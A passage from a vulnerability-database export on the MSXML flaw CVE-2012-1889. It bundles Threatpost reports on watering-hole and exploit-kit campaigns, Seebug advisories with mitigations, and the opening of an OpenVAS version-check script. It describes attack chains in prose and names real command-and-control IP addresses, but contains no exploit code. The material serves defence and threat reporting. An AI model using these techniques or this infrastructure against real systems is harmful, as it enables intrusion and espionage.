"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, 
"sourceHref": "https://packetstormsecurity.com/files/download/113765/msxml_get_definition_code_exec.rb.txt"}], "threatpost": [{"lastseen": "2018-10-06T23:02:12", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "A new APT-style espionage campaign launched this summer targeting organizations tied to financial services, government agencies and the defense industry used a technique dubbed water holing to entice victims and silently redirect them to sites hosting zero-day exploits.\n\nResearchers at RSA Security said this technique is not new (it was previously observed in the [Aurora](<https://threatpost.com/inside-aurora-google-attack-malware-011910/>) and [Ghostnet](<https://threatpost.com/ghostnet-shows-extent-online-spying-033009/>) attacks), but the month-long campaign held in June and July was the first time water holing was observed at any large scale. [Water holing](<http://blogs.rsa.com/will-gragido/lions-at-the-watering-hole-the-voho-affair/>), as described by RSA\u2019s Will Gragido, is an attack on legitimate, geographically or topically connected websites that an attacker believes members of a target organization will visit.\n\nThe latest attack, called [VOHO](<http://blogs.rsa.com/wp-content/uploads/VOHO_WP_FINAL_READY-FOR-Publication-09242012_AC.pdf>) by RSA\u2019s FirstWatch research team, compromised a local government site in Maryland and a regional bank in Massachusetts as well as sites having ties to the promotion of democracy in oppressed regions. RSA described the victims as \u201centities and people that seek to promote democratic government in countries whose existing political structure and power doesn\u2019t support (and indeed persecutes) such governmental change.\u201d\n\nVulnerabilities on those websites were exploited and a new variant of the Gh0st RAT malware was dropped. 
A host of other sites related to the defense industrial base, education, political activism in the Washington, D.C., and Boston areas were also targeted.\n\nEarlier this month, [Symantec\u2019s Elderwood Project report](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>) also connected the water holing technique to the Aurora hackers. Symantec, however, did not identify the compromised sites, nor the connection between the targets.\n\n\u201cWe believe these websites were likely chosen with exact precision and great consideration; selected from thousands upon thousands of websites due to familiarity and proximity to the targets of interest that the threat actors responsible for the campaign were truly interested in compromising,\u201d the RSA report said.\n\nVisitors to any of those sites were silently redirected to a curling site; RSA redacted the name of the site from its report, but KrebsonSecurity.com reports the site to be torontocurling.com. That site then attempted to exploit a [vulnerability in Microsoft XML Core Services](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889>) or a Java flaw that was zero-day at the time. Once infected, Gh0st RAT would call out to command and control servers at one of two IP addresses: 58.64.155.59 or 58.64.155.57, RSA said. Gh0st RAT has been used in other nation-state attacks, and like other typical botnet malware can log keystrokes, remotely operate embedded webcams or microphones, search local files, run arbitrary code, and download and exfiltrate files.\n\nRSA said the VOHO campaign was carried out in separate phases starting June 25. HTTP logs obtained by FirstWatch observed referral traffic to torontocurling.com, and exploits beginning July 9 against a vulnerability in Internet Explorer. These attacks continued for two days. 
Phase two began July 16 with exploits of a Java zero-day vulnerability, and ended July 18 when RSA said a server admin at the curling site took the server down for remediation.\n\nOnce a victim landed on one of the watering hole sites and was redirected, a chain of events kicked off in the background where the exploit determines if the visitor is running Windows and Internet Explorer and eventually compromises the browser and drops the Gh0st RAT malware via either a .CAB or .JAR file; RSA said this code was previously used in the 2009 Aurora attacks against Google Gmail accounts.\n\nMore than 32,000 visitors from 731 unique global organizations were redirected to the exploit site; almost 4,000 hosts downloaded exploit files for a 12 percent success rate; RSA said this indicates \u201ca very successful campaign.\u201d The Massachusetts regional bank was the top redirector by far, RSA said, and hosts from corporate networks and consumers suffered the largest number of compromises. Victims from financial services, state and federal government, utilities, defense industrial base and education domains represented a fraction of the compromises.\n\n\u201cAs the political and governmental hub of the United States of America, wholesale compromise of computers in this area would provide a wealth of intelligence for adversaries interested in political process and government action,\u201d RSA said in its report, adding that it is aware of at least 50 unique Gh0st networks. 
Gh0st source code is freely available online and attackers are able to constantly add new capabilities to the original code base.\n\n\u201cFrom an operational sense, having easy opportunity to modify source code allows a much more robust compromise, with decreased likelihood of attacker detection,\u201d the report said.\n", "modified": "2013-04-17T16:31:29", "published": "2012-09-25T18:08:44", "id": "THREATPOST:49C25ED2BE0FD4019AAA40EBE11EF946", "href": "https://threatpost.com/large-scale-water-holing-attack-campaigns-hitting-key-targets-092512/77045/", "type": "threatpost", "title": "Large-Scale Water Holing Attack Campaigns Hitting Key Targets", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:42", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "Attackers really like exploit kits because they offer users the ease of point-and-click exploitation, lots of potential targets and don\u2019t require a huge amount of technical knowledge to use. Attackers also enjoy Microsoft vulnerabilities, especially unpatched ones, because of the massive installed base, and at least some of the users of the [Black Hole exploit kit](<https://threatpost.com/black-hole-exploit-kit-available-free-052311/>) have begun using the exploit for the [critical MSXML vulnerability](<https://threatpost.com/attackers-targeting-msxml-flaw-malicious-flash-files-062212/>) in their attacks.\n\nThe CVE-2012-1889 vulnerability in the MSXML component in Internet Explorer has been in use by attackers for several weeks now in various scenarios. The first attacks were using malicious Office documents as the delivery mechanism for the exploit code, and they were being launched even before the vulnerability information was public. 
A second wave of attacks began shortly after the bug data was published, and that series was using malicious Flash files to deliver the exploits.\n\nThere is a module in the Metasploit Framework that can be used to exploit the MSXML vulnerability as well, and researchers say that the attackers behind some versions of Black Hole have been using an exploit that looks a lot like the Metasploit code.\n\n\u201cSure enough, within a week, CVE-2012-1889 exploiting code very similar to that published to Metasploit was seen within the landing page of a Blackhole exploit kit site,\u201d [Sophos researcher Fraser Howard](<http://nakedsecurity.sophos.com/2012/06/29/zero-day-xml-core-services-vulnerability-included-in-blackhole-exploit-kit/>) wrote in a blog post.\n\n\u201cThe code is bundled alongside the various other exploits that Blackhole currently targets. The landing page itself is obfuscated in the usual manner we expect for Blackhole, using the latest anti-emulation tricks in an attempt to thwart detection.\u201d\n\nBlack Hole is a dangerous and widely used exploit kit that is sold on underground sites, much as similar kits such as Phoenix and Eleonor are, and it includes exploits for a variety of vulnerabilities. Which exploits are included can depend upon which version of the kit you buy and from whom you buy it. 
But once an exploit is available in one version, it could then spread to other versions of Black Hole or other exploit kits altogether.\n", "modified": "2013-04-17T16:31:55", "published": "2012-07-03T15:32:34", "id": "THREATPOST:D260EAACDFFCF67AAA2234048670595E", "href": "https://threatpost.com/msxml-exploit-surfaces-black-hole-kit-070312/76761/", "type": "threatpost", "title": "MSXML Exploit Surfaces in Black Hole Kit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:41", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "A new version of the Sykipot Trojan is being pushed to unsuspecting users in a wave of online attacks, including targeted attacks on attendees of an international aerospace conference, according to researchers at the security firm AlienVault.\n\nThe latest edition of the common Trojan Horse program appeared within the last month and is spreading using e-mail messages containing links to malicious Web sites that carry out drive-by download attacks against e-mail recipients who click on the link. The attacks use exploits for recently disclosed security holes, such as [Microsoft\u2019s Windows XML Core Services vulnerability](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1889>) that was [first disclosed in June](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>). Exploits of that hole were linked to state-sponsored attacks, [which both Google and Microsoft warned about in June](<https://threatpost.com/google-warning-users-about-state-sponsored-attacks-060512/>). \n\nThe shift to drive-by downloads is a change. 
Previous versions of Sykipot have spread mostly through [file-format exploits](<https://threatpost.com/more-details-sykipot-exploits-adobe-reader-flaw-surface-121211/>) in applications like Microsoft Excel [and Adobe Reader](<https://threatpost.com/attackers-using-known-trojan-exploits-adobe-zero-day-120811/>), according to [a post by Jaime Blasco, AlienVault\u2019s Labs Manager, on Monday](<http://labs.alienvault.com/labs/index.php/2012/sykipot-is-back/>). The new Sykipot variant also uses a collection of recently registered Web domains to serve up malicious attacks. Most have been registered during the last month and are linked to the same yahoo.com e-mail address, AlienVault disclosed.\n\nIn other respects, however, the malware is the same: exploit kits that serve up the Sykipot Trojan are installed on compromised Web servers, often based in the U.S. Once installed, the Sykipot malware uses SSL (Secure Sockets Layer) to protect its communications with a central command and control (C&C) server from which it downloads a configuration file and uploads data stolen from infected systems.\n\nAt least one of the new domains used by Sykipot has been linked to targeted phishing-email attacks on attendees of the IEEE Aerospace Conference (the International Conference for Aerospace Experts, Academics, Military Personnel, and Industry Leaders), AlienVault said.\n\nIt wouldn\u2019t be the first time Sykipot had been linked to attacks against government and defense industry interests. In January, AlienVault researchers [found a Sykipot variant that was programmed to steal credentials from systems using ActivIdentity\u2019s ActivClient, smart card software used by the U.S. Department of Defense\u2019s Common Access Card (CAC) smart card deployment](<https://threatpost.com/researchers-find-sykipot-trojan-variant-hijacking-dod-smart-cards-011212/>). 
\n", "modified": "2013-04-17T16:31:55", "published": "2012-07-03T16:03:35", "id": "THREATPOST:5EE4EF2254C7A6E51307B04E267B45F8", "href": "https://threatpost.com/new-version-sykipot-trojan-linked-targeted-attacks-aerospace-industry-070312/76762/", "type": "threatpost", "title": "New Version of Sykipot Trojan Linked To Targeted Attacks On Aerospace Industry", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:44", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611", "CVE-2012-1889"], "description": "A five-year campaign primarily focused on extracting sensitive information from Japanese oil, gas, and electric utilities was outlined by researchers on Tuesday.\n\nReferred to as [Operation Dust Storm](<https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/Op_Dust_Storm_Report.pdf?t=1456276906648>) (.PDF) by researchers at Cylance, the campaign has managed to stay persistent over the years, and especially lately, by using dynamic DNS domains and customized backdoors.\n\nWhile the group has recently narrowed its sights on Japan, it\u2019s also attacked industries in South Korea, the United States, and Europe, the firm claims.\n\nActivity surrounding the campaign really picked up steam in 2015 when a handful of backdoors with hardcoded proxy addresses and credentials surfaced. Researchers traced those addresses back and noticed a slew of corporations across the oil, natural gas, construction, and transportation sector had been compromised.\n\n> New SPEAR research: Extended campaign against Japanese critical infrastructure: <https://t.co/jq8fwhObyQ> [#opduststorm](<https://twitter.com/hashtag/opduststorm?src=hash>) [pic.twitter.com/kG4X6hmJiG](<https://t.co/kG4X6hmJiG>)\n> \n> \u2014 Cylance, Inc. 
(@cylanceinc) [February 23, 2016](<https://twitter.com/cylanceinc/status/702149003945709568>)\n\nThere was a wave of attacks that year, including a major Japanese automaker in February, and a Japanese subsidiary of a South Korean electric utility and other critical infrastructure outfits in July and October.\n\nThe campaign also began using custom Android backdoors in 2015 \u2013 at first the Trojan forwarded SMS messages, and later in the year, specific files, from infected devices to C&C servers.\n\nLike many groups in the early 2010s, early iterations of the Dust Storm\u2019s activity revolved around zero days in Internet Explorer and Flash.\n\nFor example, in 2011 the attackers used an IE 8 vulnerability to infiltrate networks. They were also seen sending victims spear phishing emails with Word documents rigged with a zero day Flash exploit, CVE-2011-0611. According to Cylance, in 2012 the attackers used the same Flash exploit, coupled with another IE exploit, CVE-2012-1889, to hit victims.\n\nIn addition to the IE and Flash vulnerabilities, the group relied mostly on phishing attacks in its infancy. In 2011 it tried to siphon up Yahoo and Windows Live credentials through domains it set up and later that year capitalized on the Libyan crisis with emails about Muammar Gaddafi it sent to US government and defense targets.\n\nWhile the backdoor dropped through these exploits made headlines years ago, Cylance claims that reports around the group have mostly dissipated since.\n\nIt was Dust Storm\u2019s foray into duplicitous backdoors and proxies targeting Japanese resources that prompted researchers to investigate it in earnest last year.\n\n\u201cAs the group became more and more focused on Japan, less and less of their tactics and malware appeared in reports or write-ups. 
The targets identified escalated both in size and in the scope of affected industries,\u201d the report, penned by the firm\u2019s Director of Threat Intelligence Jon Gross, reads.\n\nWhile the Android Trojans only hit victims in Japan and South Korea, Gross acknowledges that the campaign around the attacks was \u201cmassive in comparison to previous operations,\u201d boasting over 200 domains.\n\nOfficials with SPEAR, Cylance\u2019s research division, make a point to say that they don\u2019t believe the Dust Storm attacks are intended to be destructive, but that they may be part of a long con, with their goals most likely \u201creconnaissance and long-term espionage.\u201d\n\nWhile the attacks are ongoing, the researchers, who worked with the Japanese Computer Emergency Response Team (JP-CERT) to investigate the group, claim the reason they published their research was to hopefully stunt the group\u2019s progress.\n\nCylance doesn\u2019t directly attribute the Dust Storm attacks to any group of individuals but does hint that from March 2013 to August 2013 it observed a \u201cremarkable decrease\u201d in the amount of malware it was able to gather surrounding the campaign. 
It acknowledges that Mandiant\u2019s APT 1 report, which was published in February of that year, follows more or less the same timeline, however.\n\nIn that report Mandiant outlined a series of cyber espionage campaigns carried out over the course of several years on a broad palette of victims by a Chinese threat organization, APT1.\n", "modified": "2016-03-03T00:39:24", "published": "2016-02-24T14:11:04", "id": "THREATPOST:684A9363491231773FDB7BA1EBA2B6C0", "href": "https://threatpost.com/five-year-dust-storm-apt-campaign-targets-japanese-critical-infrastructure/116436/", "type": "threatpost", "title": "Five-Year 'Dust Storm' APT Campaign Seen Targeting Japanese Critical Infrastructure", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:46", "bulletinFamily": "info", "cvelist": ["CVE-2012-1875", "CVE-2012-1889", "CVE-2017-11882"], "description": "The unpatched [vulnerability in Internet Explorer\u2019s MSXML](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>) component that Microsoft warned users about earlier this month is being used in attacks that employ malicious Flash files. Researchers say that the attacks are taking the form of drive-by downloads launched from compromised legitimate sites.\n\nThe attack scenario that\u2019s being used is a familiar one. When users visit a legitimate site that\u2019s been compromised, the malicious code injected onto the site exploits the [CVE-2012-1889](<http://technet.microsoft.com/en-us/security/advisory/2719615>) vulnerability in Internet Explorer to install malware on the victim\u2019s machine. 
It\u2019s the classic drive-by download technique and it has proven to be effective for years, and it\u2019s even more effective when there\u2019s an unpatched flaw such as this available for use.\n\n\u201cJust like the exploit code used against CVE-2012-1875, this exploit also uses an embedded SWF (Flash) file. The SWF file is responsible for performing the heap spray and setting up the shellcode,\u201d Karthikeyan Kasiviswanathan of Symantec wrote in an analysis of the attacks.\n\nWhen Microsoft first warned users about the vulnerability last week, officials said that the bug already was being used in attacks in the wild. Google researchers, who originally found the vulnerability and disclosed it to Microsoft, said that they had seen attacks against the vulnerability that were using malicious Office documents to carry the payload.\n\nThe newer series of attacks is instead using the ever-popular malicious Flash file as a delivery mechanism for the attacker\u2019s shellcode.\n\n\u201cThe exploit also supports multiple versions of Windows and languages. The heap spray and shellcode are customized depending on the combination of the Windows version and languages,\u201d Kasiviswanathan said. \u201cWhen the vulnerability is triggered, the execution is transferred to the shellcode. The shellcode is designed to download an encrypted payload from a URL and save it to the Temporary Internet Files folder.\u201d\n\nIf you\u2019re running Internet Explorer, you should use the [Microsoft FixIt tool](<http://support.microsoft.com/kb/2719615>) for the vulnerability, which is a stop-gap until Microsoft has a full patch available. 
\n", "modified": "2013-04-17T16:31:59", "published": "2012-06-22T14:03:58", "id": "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "href": "https://threatpost.com/attackers-targeting-msxml-flaw-malicious-flash-files-062212/76726/", "type": "threatpost", "title": "Attackers Targeting MSXML Flaw With Malicious Flash Files", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:18", "bulletinFamily": "info", "cvelist": ["CVE-2012-0779", "CVE-2012-1535", "CVE-2012-1875", "CVE-2012-1889"], "description": "**[](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>)UPDATE**\u2013The same team that attacked [Google in the Aurora campaign](<https://threatpost.com/aurora-attack-malware-components-may-be-four-years-old-012010/>) in 2009 is still active and has been conducting a long-term campaign targeting defense contractors, financial services companies, energy companies, human rights organizations and government agencies using a seemingly inexhaustible supply of zero day vulnerabilities. The crew is using a variety of techniques to go after its targets, most notably compromising legitimate Web sites frequented by employees of the targeted organizations and then delivering exploits for one or more of their stockpiled zero-day bugs, researchers say.\n\nThe team behind these operations appears to be in the top tier of professional attack teams, possessing the ability to do original research to find new vulnerabilities in popular applications such as Adobe Flash and Internet Explorer, and then write exploits for those flaws, as well. 
Researchers at Symantec have been tracking the group, which they\u2019ve dubbed the Elderwood gang, for some time, and have seen the crew using previously unknown vulnerabilities in rapid succession over the course of the last couple of years in attacks aimed at defense contractors, government agencies and other high-value targets.\n\nThe number of groups doing their own research and finding zero days and then writing exploits for them is virtually impossible to know, given the structure of the cybercrime underground, but it is thought to be a small number relative to the overall population of attackers. That kind of research takes time, money and high-level technical skills that many groups solely interested in stealing money just don\u2019t have.\n\n\u201cIn order to discover these vulnerabilities, a large undertaking would be required by the attackers to thoroughly reverse-engineer the compiled applications. This effort would be substantially reduced if they had access to source code. The vulnerabilities are used as needed, often within close succession of each other if exposure of any of the vulnerabilities is imminent,\u201d Gavin O\u2019Gorman and Geoff McDonald of Symantec wrote in a detailed [analysis of the Elderwood crew\u2019s tactics](<https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf>).\n\n\u201cThe scale of the attacks, in terms of the number of victims and the duration of the attacks, are another indication of the resources available to the attackers. Victims are attacked, not for petty crime or theft, but for the wholesale gathering of intelligence and intellectual property. 
The resources required to identify and acquire useful information\u2014let alone analyze that information\u2014could only be provided by a large criminal organization, attackers supported by a nation state, or a nation state itself.\u201d\n\nThe researchers said that this group is utilizing one technique, which they call a \u201cwatering hole\u201d attack, that involves waiting for the targets to come to them rather than going after the targeted organizations or employees directly. To accomplish this, the Elderwood gang identifies a Web site that\u2019s frequented by employees of organizations in the sector that they\u2019re targeting, say financial services. They then compromise that site, whether through SQL injection or some other common technique, and plant exploit code on some of the public pages of the site. They then wait for the targeted employees to hit the pages, at which point the exploit fires and ideally (for the attackers) compromises the victim\u2019s machine.\n\nThe idea is roughly the same as a typical drive-by download attack that uses SQL injection as its initial vector to compromise a site, but in this case the attacker is going after a specific site rather than a large volume of vulnerable sites and is looking for a specific subset of victims, as well. 
Researchers at [RSA Security also analyzed attacks of this kind](<http://blogs.rsa.com/will-gragido/lions-at-the-watering-hole-the-voho-affair/>) in July, and found that the attackers were installing a variant of Gh0stRAT, a well-known remote-access tool that\u2019s been used in targeted [attacks by Chinese groups](<https://threatpost.com/ghostnet-shows-extent-online-spying-033009/>) for several years.\n\nJoe Stewart, director of malware research at Dell SecureWorks, has been following a series of attacks by groups loosely connected to the crew that Symantec is identifying as the Elderwood gang and said that there\u2019s no question about the group\u2019s capabilities.\n\n\u201cThey\u2019re definitely doing their own research, or paying someone for immediate access to it. They certainly have plenty of zero days they\u2019ve come out with,\u201d Stewart said. \n\nThis Elderwood group has used a number of zero days in the last couple of years as part of its attack campaigns, including the [CVE-2012-1535 Flash vulnerability](<https://threatpost.com/adobe-patches-critical-flash-bug-releases-massive-reader-update-081412/>) that Adobe patched last month and the [CVE-2012-1875 MSXML flaw](<https://threatpost.com/exploit-code-surfaces-cve-2012-1875-internet-explorer-bug-061812/>) in Internet Explorer that Microsoft fixed in June. The group will use exploits for these vulnerabilities both in Web-based attacks and in targeted spear-phishing email attacks. But in both cases, the goal is the theft of intellectual property.\n\n\u201cAlthough watering hole attacks have been known about since approximately March of 2011, the activity outlined in this report marks a substantial increase. 
Three zero-day exploits, CVE-2012-0779, CVE-2012-1875, and CVE-2012-1889 have all been used within a 30-day period to serve up back door Trojans from compromised websites,\u201d the paper says.\n\nThe connection to the attack on Google in late 2009, which was named Aurora at the time, comes both from some commonalities in the way that the attackers are obfuscating parts of their code, which also was seen in the Hydraq Trojan, the piece of malware used in the Google attack. \n\n\u201cWe believe the Hydraq attack and the recent attacks that exploit the vulnerabilities outlined above are linked,\u201d O\u2019Gorman and McDonald wrote.\n\n\u201cAdditional links joining the various exploits together included a shared command-and-control infrastructure. Trojans dropped by different exploits were connecting to the same servers to retrieve commands from the attackers. Some compromised websites used in the watering hole attacks had two different exploits injected into them one after the other. Yet another connection is the use of similar encryption in documents and malicious executables. A technique used to pass data to a SWF file was re-used in multiple attacks. Finally, the same family of Trojan was dropped from multiple different exploits,\u201d the researchers said.\n\nThe Elderwood team may have a custom platform set up to help take exploit code for a new vulnerability, drop it into a benign Word document or PDF and then bundle it with the Trojan payload to have the components for a new attack at hand as quickly as possible. The crew also has created a SWF file that is used in multiple attacks, with small changes, to help place their exploit code in the optimal part of memory.\n\n\u201cInstead of developing code to perform these tasks for each different exploit, the attackers have developed a common SWF file that is used solely to create the correct conditions in memory and accepts a parameter specifying where to download the Trojan. 
In some attacks, the parameter name was \u201cElderwood.\u201d The same SWF file was seen used when exploiting 3 different vulnerabilities (CVE-2012-0779, CVE-2012-1875, CVE-2012-1889). By using a common SWF file, the attackers can simply deploy a new trigger, that is, a zero-day exploit, and the SWF handles the rest of the work, retrieving and decoding the back door Trojan,\u201d the researchers said.\n\nThe Elderwood team also seems to have an uncanny ability to sense when one of the zero days it has been using is about to be disclosed publicly. It often will shift to using a new vulnerability shortly before one of its current favorites is exposed, suggesting the crew watches the developments in the underground and legitimate security communities closely.\n\n\u201cThe group seemingly has an unlimited supply of zero-day vulnerabilities. The vulnerabilities are used as needed, often within close succession of each other if exposure of the currently used vulnerability is imminent,\u201d Symantec\u2019s report says.\n\nStewart of Dell SecureWorks said that he hasn\u2019t seen the groups he follows dropping a specific exploit because a vulnerability is about to be patched. But he said the Elderwood gang likely is part of one of the two main attack groups based in China, with this one centered in Beijing and another based around Shanghai.\n\n\u201cThey\u2019re one of the two main actor groups we see and we base that assessment on the sharing of infrastructure and where it\u2019s located and some other details,\u201d he said. \u201cThe reason they use so many different types of malware is that they probably have people inside the groups that have certain preferences, things they like and they\u2019re comfortable with. They use Gh0st, Hydraq, whatever they need. They have a lot of malware. It speaks to a large number of actors. 
They\u2019re all getting marching orders from the same place, but it\u2019s not the exact same people hitting the keys.\u201d\n\nThis larger group of attackers has been active for years, well before the attack on Google became public in early 2010.\n\n\u201cThey were active well before [the Google attack]. I have samples from them from the 2006 to 2007 time frame and some that are similar and probably them as far back as 2003,\u201d Stewart said. \n\n\u201cThis is years of constant, dedicated, persistent attacks.\u201d\n\n_This story was updated on Sept. 7 to add comments from Joe Stewart._\n", "modified": "2013-04-17T16:31:36", "published": "2012-09-07T14:41:30", "id": "THREATPOST:8118BE47AC766B8F6DD708B119E33DFE", "href": "https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/76987/", "type": "threatpost", "title": "'Elderwood' Crew, Tied to Google Aurora Attack, Targeting Defense, Energy, Finance Companies", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:52:00", "description": "CVE ID: CVE-2012-1889\r\n\r\nMicrosoft XML Core Services (MSXML)\u662f\u4e00\u7ec4\u670d\u52a1\uff0c\u53ef\u7528JScript\u3001VBScript\u3001Microsoft\u5f00\u53d1\u5de5\u5177\u7f16\u5199\u7684\u5e94\u7528\u6784\u5efa\u57fa\u4e8eXML\u7684Windows-native\u5e94\u7528\u3002\r\n\r\nMicrosoft XML Core Services 3.0\u30014.0\u30015.0\u30016.0\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u53ef\u80fd\u5bfc\u81f4\u8bbf\u95ee\u672a\u521d\u59cb\u5316\u5185\u5b58\u5bf9\u8c61\u8fdb\u800c\u53d1\u751f\u5185\u5b58\u7834\u574f\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5728\u7528\u6237\u901a\u8fc7IE\u67e5\u770b\u6076\u610f\u7f51\u9875\u65f6\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nMicrosoft XML Core Services 6.0\r\nMicrosoft XML Core Services 5.0\r\nMicrosoft XML Core Services 4.0\r\nMicrosoft XML Core Services 
3.0\nTemporary workaround:\r\n\r\nIf you cannot install the patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:\r\n\r\n* Deploy the Enhanced Mitigation Experience Toolkit (EMET)\r\n\r\n* Configure IE to prompt before running Active Scripting, or disable Active Scripting in the IE and local intranet security zones.\r\n\r\nVendor patch:\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft has released a security advisory (2719615) and a corresponding patch for this issue:\r\n\r\n2719615: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution\r\n\r\nLink: http://technet.microsoft.com/en-us/security/advisory/2719615", "published": "2012-06-13T00:00:00", "type": "seebug", "title": "Microsoft XML Core Services Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2012-06-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60204", "id": "SSV:60204", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:50:53", "description": "CVE ID: CVE-2012-1889\r\n\r\nMicrosoft XML Core Services (MSXML) lets users of JScript, VBScript, and Microsoft Visual Studio 6.0 build XML applications that interoperate with other applications conforming to the XML 1.0 standard.\r\n\r\nMicrosoft XML Core Services 
3.0, 4.0, 5.0, and 6.0 have a security vulnerability when accessing an uninitialized memory location, which can allow a remote attacker to execute arbitrary code or cause a denial of service via a specially crafted website.\n0\nMicrosoft Windows\nTemporary workaround:\r\n\r\nIf you cannot install the patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:\r\n\r\n* Apply the Microsoft Fix it solution for XML Core Services 5.0.\r\n\r\n* Configure IE to prompt when running Active Scripting, or disable it\r\n\r\n* Block ActiveX controls in IE\r\n\r\nVendor patch:\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft has released a security advisory (2719615) and a corresponding patch for this issue:\r\n\r\n2719615: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution\r\n\r\nLink: http://technet.microsoft.com/zh-cn/security/advisory/2719615", "published": "2012-07-11T00:00:00", "type": "seebug", "title": "MSXML Uninitialized Memory Corruption Vulnerability (MS12-043)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2012-07-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60271", "id": "SSV:60271", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1889"], "description": "This host is installed with Microsoft XML Core Services and\n is prone to remote code execution vulnerability.", "modified": "2017-04-18T00:00:00", 
"published": "2012-06-14T00:00:00", "id": "OPENVAS:802864", "href": "http://plugins.openvas.org/nasl.php?oid=802864", "type": "openvas", "title": "Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_xml_core_services_code_exec_vuln.nasl 5963 2017-04-18 09:02:14Z teissa $\n#\n# Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_id(802864);\n script_version(\"$Revision: 5963 $\");\n script_cve_id(\"CVE-2012-1889\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-18 11:02:14 +0200 (Tue, 18 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-14 12:09:11 +0530 (Thu, 14 Jun 2012)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)\");\n\n script_tag(name: \"summary\" , value:\"This host is installed with Microsoft XML Core Services and\n is prone to remote code execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Get the vulnerable file version and check\n appropriate patch is applied or not.\");\n\n script_tag(name: \"insight\" , value:\"Microsoft XML Core Services attempts to access\n an object in memory that has not been initialized, which allows an attacker to\n corrupt memory.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation could allow remote\n attackers to execute arbitrary code as the logged-on user.\n\n Impact Level: System/Application\");\n\n script_tag(name: \"affected\" , value:\"Microsoft Expression Web 2\n Microsoft Office Word Viewer\n Microsoft Office Compatibility\n Microsoft Office 2003 Service Pack 3 and prior\n Microsoft Office 2007 Service Pack 3 and prior\n Microsoft Expression Web Service Pack 1 and prior\n Microsoft 